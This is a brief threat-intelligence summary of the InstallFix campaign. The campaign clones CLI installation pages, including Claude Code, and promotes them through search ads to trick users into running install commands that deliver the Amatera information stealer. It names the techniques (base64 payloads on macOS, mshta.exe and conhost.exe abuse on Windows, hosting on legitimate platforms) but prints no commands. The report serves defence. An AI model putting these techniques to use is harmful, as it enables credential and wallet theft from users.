Threat actors are using InstallFix, a ClickFix variant, to trick users into running malicious install commands from cloned CLI pages and promoted search ads, delivering the Amatera information stealer. The attacks exploit curl-to-bash habits, legitimate hosting platforms, and sponsored search results to remain evasive, so users should rely on official download sources and avoid promoted search results. #Amatera #ClaudeCode
Keypoints
- InstallFix clones legitimate CLI installation pages (e.g., Claude Code) to present malicious install commands.
- Attackers promote fake install pages via malvertising and AI-enhanced search results on Google and Bing.
- macOS commands deliver base64-encoded payloads while Windows commands abuse mshta.exe and conhost.exe to execute Amatera.
- The payload, Amatera stealer, exfiltrates credentials, cookies, session tokens, cryptocurrency wallets, and system information.
- Malicious pages are hosted on legitimate platforms (Squarespace, Cloudflare Pages, GitHub, Tencent EdgeOne), so users should use official sites, bookmark downloads, and avoid sponsored search results.